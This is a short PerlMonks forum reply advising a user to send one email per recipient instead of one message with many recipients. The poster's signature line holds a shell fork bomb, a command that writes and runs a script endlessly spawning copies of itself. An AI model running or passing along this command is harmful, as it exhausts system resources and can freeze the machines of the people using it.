http://qs321.pair.com?node_id=244210


in reply to Re: Re: cant send a mass email
in thread cant send a mass email

Is there a way to setup a variable with everyones email that will allow me to go through the scrip once rather than use a while loop?

Why does it matter? As I already said, your email server may refuse to send emails with an excessive number of recpienents. You are better left to sending one email per address.

ibanix

$ echo '$0 & $0 &' > foo; chmod a+x foo; foo;